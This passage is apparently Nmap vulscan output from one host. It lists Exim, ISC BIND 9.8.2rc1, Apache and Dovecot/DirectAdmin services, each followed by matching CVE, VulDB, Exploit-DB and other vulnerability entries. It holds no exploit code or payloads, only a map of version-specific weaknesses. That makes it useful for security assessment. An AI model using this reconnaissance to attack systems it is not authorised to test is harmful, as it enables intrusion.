10971| [1010081] Exim Buffer Overflows in 'accept.c' and 'verify.c' Let Remote Users Execute Arbitrary Code
10972| [1007609] Exim Heap Overflow in 'smtp_in.c' May Allow Remote Arbitrary Code Execution
10973| [1005756] Exim Mail Server Format String Bug Lets Local Exim Administrators Execute Arbitrary Code With Root Privileges
10974| [1003547] Potential Bug in Exim Mail Server May Let Local Users Execute Code With Root Privileges
10975| [1003014] Exim Mail Server Pipe Address Validation Error May Let Remote Users Execute Arbitrary Code With Root Privileges in a Certain Configuration
10976| [1001694] Exim Mail Server May Allow Remote Users to Execute Arbitrary Code with Root-Level Privileges on the Server
10977|
10978| OSVDB - http://www.osvdb.org:
10979| [93004] Dovecot with Exim sender_address Parameter Remote Command Execution
10980| [87599] Mozilla Multiple Product copyTexImage2D Call Image Dimension Handling Memory Corruption
10981| [87581] Mozilla Multiple Product texImage2D Call Handling Memory Corruption
10982| [86616] Exim src/dkim.c dkim_exim_query_dns_txt() Function DNS Record Parsing Remote Overflow
10983| [81523] Mozilla Multiple Product WebGL texImage2D() Function JSVAL_TO_OBJECT Remote Code Execution
10984| [72642] Exim DKIM Identity Lookup Item Remote Code Execution
10985| [72156] Exim src/dkim.c dkim_exim_verify_finish() Function DKIM-Signature Header Format String
10986| [70696] Exim log.c open_log() Function Local Privilege Escalation
10987| [69860] Exim exim User Account Configuration File Directive Local Privilege Escalation
10988| [69685] Exim string_format Function Remote Overflow
10989| [65159] Exim transports/appendfile.c MBX Locking Race Condition Permission Modification
10990| [65158] Exim transports/appendfile.c Hardlink Handling Arbitrary File Overwrite
10991| [57575] teximg Plugin for ikiwiki TEX Command Arbitrary File Local Disclosure
10992| [23849] sa-exim greylistclean.cron Arbitrary File Deletion
10993| [13073] Oracle Database Server Advanced Queuing Component dbms_transform_eximp Unspecified Security Issue
10994| [12946] Exim -bh Command Line Option dns_build_reverse Function Local Overflow
10995| [12727] Exim SPA Authentication spa_base64_to_bits Function Remote Overflow
10996| [12726] Exim -be Command Line Option host_aton Function Local Overflow
10997| [10877] Exim smtp_in.c HELO/EHLO Remote Overflow
10998| [10360] Exim daemon.c pid_file_path Variable Manipulation Arbitrary Command Execution
10999| [10032] libXpm CreateXImage Function Integer Overflow
11000| [7160] Exim .forward :include: Option Privilege Escalation
11001| [6479] Vexim COOKIE Authentication Credential Disclosure
11002| [6478] Vexim Multiple Parameter SQL Injection
11003| [5930] Exim Parenthesis File Name Filter Bypass
11004| [5897] Exim header_syntax Function Remote Overflow
11005| [5896] Exim sender_verify Function Remote Overflow
11006| [5530] Exim Localhost Name Arbitrary Command Execution
11007| [5330] Exim Configuration File Variable Overflow
11008| [1855] Exim Batched SMTP Mail Header Format String
11009|_
1101053/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
11011| vulscan: VulDB - https://vuldb.com:
11012| [93249] ISC BIND up to 9.8.x/9.9.9-P3/9.9.9-S5/9.10.4-P3/9.11.0 DNAME Response db.c denial of service
11013| [93015] ISC BIND up to 9.8.4/9.9.2 Packet Option DNS Packet Crash denial of service
11014| [80354] ISC BIND up to 9.8.8/9.9.8-P2/9.9.8-S3/9.10.3-P2 Address Prefix List apl_42.c denial of service
11015| [77552] ISC BIND up to 9.8.8/9.9.7-P2/9.10.2-P3 OpenPGP Key openpgpkey_61.c denial of service
11016| [77551] ISC BIND up to 9.8.8/9.9.7-P2/9.10.2-P3 DNSSEC Key buffer.c denial of service
11017| [13184] ISC BIND 9.8.1-P1 Smoothed Round Trip Time Algorithm DNS spoofing
11018| [9946] ISC BIND 9.8.1-P1 SRTT Algorithm privilege escalation
11019| [4443] ISC BIND up to 9.8.x Recursive Query Processor denial of service
11020| [57895] ISC BIND 9.8.0/9.8.1 Crash denial of service
11021| [4357] ISC BIND up to 9.8.x Negative Caching RRSIG RRsets denial of service
11022| [57404] ISC BIND 9.8.0 denial of service
11023| [135686] Bosch Smart Home Controller up to 9.8 Backup information disclosure
11024| [135684] Bosch Smart Home Controller up to 9.8 JSON-RPC Interface information disclosure
11025| [129940] Adobe Connect up to 9.8.1 Session Token information disclosure
11026| [117535] Synacor Zimbra Collaboration up to 8.6.0 Patch 9/8.7.11 Patch 2/8.8.7 mailboxd Error information disclosure
11027| [11371] Cisco ONS 15454 9.8.0 Controller Card denial of service
11028|
11029| MITRE CVE - https://cve.mitre.org:
11030| [CVE-2013-4854] The RFC 5011 implementation in rdata.c in ISC BIND 9.7.x and 9.8.x before 9.8.5-P2, 9.8.6b1, 9.9.x before 9.9.3-P2, and 9.9.4b1, and DNSco BIND 9.9.3-S1 before 9.9.3-S1-P1 and 9.9.4-S1b1, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query with a malformed RDATA section that is not properly handled during construction of a log message, as exploited in the wild in July 2013.
11031| [CVE-2013-3919] resolver.c in ISC BIND 9.8.5 before 9.8.5-P1, 9.9.3 before 9.9.3-P1, and 9.6-ESV-R9 before 9.6-ESV-R9-P1, when a recursive resolver is configured, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a record in a malformed zone.
11032| [CVE-2013-2266] libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5b2, 9.9.x before 9.9.2-P2, and 9.9.3 before 9.9.3b2 on UNIX platforms allows remote attackers to cause a denial of service (memory consumption) via a crafted regular expression, as demonstrated by a memory-exhaustion attack against a machine running a named process.
11033| [CVE-2012-5689] ISC BIND 9.8.x through 9.8.4-P1 and 9.9.x through 9.9.2-P1, in certain configurations involving DNS64 with a Response Policy Zone that lacks an AAAA rewrite rule, allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for an AAAA record.
11034| [CVE-2012-5688] ISC BIND 9.8.x before 9.8.4-P1 and 9.9.x before 9.9.2-P1, when DNS64 is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via a crafted query.
11035| [CVE-2012-5166] ISC BIND 9.x before 9.7.6-P4, 9.8.x before 9.8.3-P4, 9.9.x before 9.9.1-P4, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P4 allows remote attackers to cause a denial of service (named daemon hang) via unspecified combinations of resource records.
11036| [CVE-2012-4244] ISC BIND 9.x before 9.7.6-P3, 9.8.x before 9.8.3-P3, 9.9.x before 9.9.1-P3, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P3 allows remote attackers to cause a denial of service (assertion failure and named daemon exit) via a query for a long resource record.
11037| [CVE-2012-1667] ISC BIND 9.x before 9.7.6-P1, 9.8.x before 9.8.3-P1, 9.9.x before 9.9.1-P1, and 9.4-ESV and 9.6-ESV before 9.6-ESV-R7-P1 does not properly handle resource records with a zero-length RDATA section, which allows remote DNS servers to cause a denial of service (daemon crash or data corruption) or obtain sensitive information from process memory via a crafted record.
11038| [CVE-2012-1033] The resolver in ISC BIND 9 through 9.8.1-P1 overwrites cached server names and TTL values in NS records during the processing of a response to an A record query, which allows remote attackers to trigger continued resolvability of revoked domain names via a "ghost domain names" attack.
11039| [CVE-2011-4313] query.c in ISC BIND 9.0.x through 9.6.x, 9.4-ESV through 9.4-ESV-R5, 9.6-ESV through 9.6-ESV-R5, 9.7.0 through 9.7.4, 9.8.0 through 9.8.1, and 9.9.0a1 through 9.9.0b1 allows remote attackers to cause a denial of service (assertion failure and named exit) via unknown vectors related to recursive DNS queries, error logging, and the caching of an invalid record by the resolver.
11040| [CVE-2011-2465] Unspecified vulnerability in ISC BIND 9 9.8.0, 9.8.0-P1, 9.8.0-P2, and 9.8.1b1, when recursion is enabled and the Response Policy Zone (RPZ) contains DNAME or certain CNAME records, allows remote attackers to cause a denial of service (named daemon crash) via an unspecified query.
11041| [CVE-2011-2464] Unspecified vulnerability in ISC BIND 9 9.6.x before 9.6-ESV-R4-P3, 9.7.x before 9.7.3-P3, and 9.8.x before 9.8.0-P4 allows remote attackers to cause a denial of service (named daemon crash) via a crafted UPDATE request.
11042| [CVE-2011-1910] Off-by-one error in named in ISC BIND 9.x before 9.7.3-P1, 9.8.x before 9.8.0-P2, 9.4-ESV before 9.4-ESV-R4-P1, and 9.6-ESV before 9.6-ESV-R4-P1 allows remote DNS servers to cause a denial of service (assertion failure and daemon exit) via a negative response containing large RRSIG RRsets.
11043| [CVE-2011-1907] ISC BIND 9.8.x before 9.8.0-P1, when Response Policy Zones (RPZ) RRset replacement is enabled, allows remote attackers to cause a denial of service (assertion failure and daemon exit) via an RRSIG query.
11044| [CVE-2010-1567] The SIP implementation on the Cisco PGW 2200 Softswitch with software before 9.8(1)S5 allows remote attackers to cause a denial of service (device crash) via a malformed header, aka Bug ID CSCsz13590.
11045|
11046| SecurityFocus - https://www.securityfocus.com/bid/:
11047| [48264] Aastra 9480i CT Multiple Information Disclosure Vulnerabilities
11048| [61774] ISC BIND 9 SRTT Algorithm Authoritative Server Selection Security Vulnerability
11049| [61479] ISC BIND 9 DNS RDATA Handling CVE-2013-4854 Remote Denial of Service Vulnerability
11050| [58736] ISC BIND 9 'libdns' Remote Denial of Service Vulnerability
11051| [57556] ISC BIND 9 DNS64 CVE-2012-5689 Remote Denial of Service Vulnerability
11052| [56817] ISC BIND 9 DNS64 Remote Denial of Service Vulnerability
11053| [55852] ISC BIND 9 DNS RDATA Handling CVE-2012-5166 Remote Denial of Service Vulnerability
11054| [55522] ISC BIND 9 DNS Resource Records Handling CVE-2012-4244 Remote Denial of Service Vulnerability
11055| [54659] ISC BIND 9 TCP Query Remote Denial of Service Vulnerability
11056| [54658] ISC BIND 9 DNSSEC Validation CVE-2012-3817 Denial of Service Vulnerability
11057| [53772] ISC BIND 9 DNS Resource Records Handling Remote Denial of Service Vulnerability
11058| [50690] ISC BIND 9 Recursive Queries Remote Denial of Service Vulnerability
11059| [48566] ISC BIND 9 Unspecified Packet Processing Remote Denial of Service Vulnerability
11060| [48565] ISC BIND 9 RPZ Configurations Remote Denial of Service Vulnerabilities
11061| [48007] ISC BIND 9 Large RRSIG RRsets Remote Denial of Service Vulnerability
11062| [47734] ISC BIND 9 RRSIG Query Type Remote Denial of Service Vulnerability
11063| [46491] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
11064| [45385] ISC BIND 9 DNSSEC Validation Remote Denial of Service Vulnerability
11065| [45133] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
11066| [41730] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
11067| [37865] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
11068| [37118] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
11069| [35848] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
11070| [25076] ISC BIND 9 Default ACL Settings Recursive Queries And Cached Content Security Bypass Vulnerability
11071| [25037] ISC BIND 9 Remote Cache Poisoning Vulnerability
11072| [4936] ISC BIND 9 Remote Denial Of Service Vulnerability
11073|
11074| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11075| [85799] Cisco Unified IP Phones 9900 Series directory traversal
11076| [75412] Cisco Unified IP Phones 9900 series RT privilege escalation
11077| [68733] Cisco 9000 Series Aggregation Service Router IPv4 packet denial of service
11078| [9704] Multiple Lucent router UDP port 9 could disclose sensitive information
11079| [9250] BIND 9 dns_message_findtype() denial of service
11080| [1852] BIND prior to 4.9.7 buffer overflow affects Digital Firewall 97 users
11081| [539] Microsoft Windows 95 and Internet Explorer password disclosure
11082| [86004] ISC BIND RDATA denial of service
11083| [84767] ISC BIND denial of service
11084| [83066] ISC BIND denial of service
11085| [81504] ISC BIND AAAA denial of service
11086| [80510] ISC BIND DNS64 denial of service
11087| [79121] ISC BIND queries denial of service
11088| [78479] ISC BIND RDATA denial of service
11089| [77185] ISC BIND TCP queries denial of service
11090| [77184] ISC BIND bad cache denial of service
11091| [76034] ISC BIND rdata denial of service
11092| [73053] ISC BIND cache update policy security bypass
11093| [71332] ISC BIND recursive queries denial of service
11094| [68375] ISC BIND UPDATE denial of service
11095| [68374] ISC BIND Response Policy Zones denial of service
11096| [67665] ISC BIND RRSIG Rrsets denial of service
11097| [67297] ISC BIND RRSIG denial of service
11098| [65554] ISC BIND IXFR transfer denial of service
11099| [63602] ISC BIND allow-query security bypass
11100| [63596] ISC BIND zone data security bypass
11101| [63595] ISC BIND RRSIG denial of service
11102| [62072] ISC BIND DNSSEC query denial of service
11103| [62071] ISC BIND ACL security bypass
11104| [61871] ISC BIND anchors denial of service
11105| [60421] ISC BIND RRSIG denial of service
11106| [56049] ISC BIND out-of-bailiwick weak security
11107| [55937] ISC Bind unspecified cache poisoning
11108| [55753] ISC BIND DNSSEC NSEC/NSEC3 cache poisoning
11109| [54416] ISC BIND DNSSEC cache poisoning
11110| [52073] ISC BIND dns_db_findrdataset() denial of service
11111| [47409] Multiple Mozilla products XBL loadBindingDocument information disclosure
11112| [45234] ISC BIND UDP denial of service
11113| [39670] ISC BIND inet_network buffer overflow
11114| [37233] libgssapi ISC BIND Novell SUSE Linux Enterprise Server GSS-TSIG request denial of service
11115| [37128] RHSA update for ISC BIND RRset denial of service not installed
11116| [37127] RHSA update for ISC BIND named service denial of service not installed
11117| [36275] ISC BIND DNS query spoofing
11118| [35575] ISC BIND query ID cache poisoning
11119| [35571] ISC BIND ACL security bypass
11120| [31838] ISC BIND RRset denial of service
11121| [31799] ISC BIND named service denial of service
11122| [29876] HP Tru64 ypbind core dump information disclosure
11123| [28745] ISC BIND DNSSEC RRset denial of service
11124| [28744] ISC BIND recursive INSIST denial of service
11125| [22041] BEA WebLogic Server and Express LDAP anonymous bind information disclosure
11126| [18836] BIND hostname disclosure
11127| [10624] ISC BIND DNS stub resolver library (libresolv.a) stack buffer overflows
11128| [10333] ISC BIND SIG null pointer dereference denial of service
11129| [10332] ISC BIND OPT resource record (RR) denial of service
11130| [10304] ISC BIND SIG cached resource records (RR) heap buffer overflow
11131| [7027] Cisco CBOS Web-based configuration utility binds to port 80 by default
11132| [5814] ISC BIND "
11133| [5540] ISC BIND can be remotely crashed by issuing ZXFR requests
11134| [5462] ISC BIND AXFR host command remote buffer overflow
11135|
11136| Exploit-DB - https://www.exploit-db.com:
11137| [17376] Aastra IP Phone 9480i Web Interface Data disclosure Vulnerability
11138| [9300] ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC
11139|
11140| OpenVAS (Nessus) - http://www.openvas.org:
11141| [103090] ISC BIND 9 IXFR Transfer/DDNS Update Remote Denial of Service Vulnerability
11142| [103031] ISC BIND 9 < 9.7.2-P2 Multiple Vulnerabilities
11143| [103030] ISC BIND 9 'RRSIG' Record Type Negative Cache Remote Denial of Service Vulnerability
11144| [100717] ISC BIND 9 'RRSIG' Record Type Remote Denial of Service Vulnerability
11145| [100458] ISC BIND 9 DNSSEC Bogus NXDOMAIN Response Remote Cache Poisoning Vulnerability
11146| [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
11147| [100251] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
11148| [63208] Fedora Core 9 FEDORA-2009-0350 (bind)
11149| [11226] Oracle 9iAS default error information disclosure
11150|
11151| SecurityTracker - https://www.securitytracker.com:
11152| [1025811] Cisco ASR 9000 Series Router IPv4 Packet Processing Flaw Lets Remote Users Deny Service
11153| [1012995] BIND 9 Validator Assumption Error May Let Remote Users Deny Service
11154| [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
11155| [1003675] Oracle 9iAS Application Server Discloses CGI-BIN Script Source Code to Remote Users
11156| [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords
11157| [1028901] (McAfee Issues Advisory for McAfee Email Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11158| [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11159| [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11160| [1028866] (McAfee Issues Fix for McAfee Firewall Enterprise) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11161| [1028854] (NetBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11162| [1028849] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11163| [1028848] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11164| [1028839] (FreeBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11165| [1028838] ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11166| [1028632] ISC BIND RUNTIME_CHECK Error Lets Remote Users Deny Service Against Recursive Resolvers
11167| [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service
11168| [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service
11169| [1027642] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
11170| [1027529] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
11171| [1026647] ISC BIND Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable
11172| [1026335] ISC BIND Invalid Record Caching Flaw Lets Remote Users Deny Service
11173| [1025743] ISC BIND Response Policy Zones DNAME/CNAME Processing Flaw Lets Remote Users Deny Service
11174| [1025742] ISC BIND Packet Processing Flaw Lets Remote Users Deny Service
11175| [1015850] Samba winbindd Daemon Discloses Server Password to Local Users
11176| [1003359] BindView NETinventory Discloses Password to Local Users During Auditing
11177| [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users
11178|
11179| OSVDB - http://www.osvdb.org:
11180| [72941] Aastra 9480i IP Phone Multiple Configuration File Direct Request Information Disclosure
11181|_
1118280/tcp open ssl/http Apache/2
11183|_http-server-header: Apache/2
11184110/tcp open pop3 Dovecot DirectAdmin pop3d
11185| vulscan: VulDB - https://vuldb.com:
11186| [139289] cPanel up to 68.0.14 dovecot-xaps-plugin Format privilege escalation
11187| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
11188| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
11189| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
11190| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
11191| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
11192| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
11193| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
11194| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
11195| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
11196| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
11197| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
11198| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
11199| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
11200| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
11201| [95100] DirectAdmin up to 1.50.1 Crash denial of service
11202| [69835] Dovecot 2.2.0/2.2.1 denial of service
11203| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
11204| [65684] Dovecot up to 2.2.6 unknown vulnerability
11205| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
11206| [63692] Dovecot up to 2.0.15 spoofing
11207| [7062] Dovecot 2.1.10 mail-search.c denial of service
11208| [62578] DirectAdmin 1.403 cross site scripting
11209| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
11210| [57517] Dovecot up to 2.0.12 Login directory traversal
11211| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
11212| [57515] Dovecot up to 2.0.12 Crash denial of service
11213| [54944] Dovecot up to 1.2.14 denial of service
11214| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
11215| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
11216| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
11217| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
11218| [53277] Dovecot up to 1.2.10 denial of service
11219| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
11220| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
11221| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
11222| [45256] Dovecot up to 1.1.5 directory traversal
11223| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
11224| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11225| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11226| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
11227| [40356] Dovecot 1.0.9 Cache unknown vulnerability
11228| [38747] DirectAdmin 1.30.2 cross site scripting
11229| [38222] Dovecot 1.0.2 directory traversal
11230| [37578] DirectAdmin 1.30.1 cross site scripting
11231| [36376] Dovecot up to 1.0.x directory traversal
11232| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
11233| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
11234| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
11235| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
11236|
11237| MITRE CVE - https://cve.mitre.org:
11238| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
11239| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
11240| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
11241| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
11242| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
11243| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
11244| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
11245| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
11246| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
11247| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
11248| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11249| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11250| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
11251| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
11252| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
11253| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
11254| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
11255| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
11256| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
11257| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
11258| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
11259| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
11260| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
11261| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
11262| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
11263| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
11264| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
11265| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
11266| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
11267| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
11268| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
11269| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
11270| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
11271| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
11272| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
11273| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
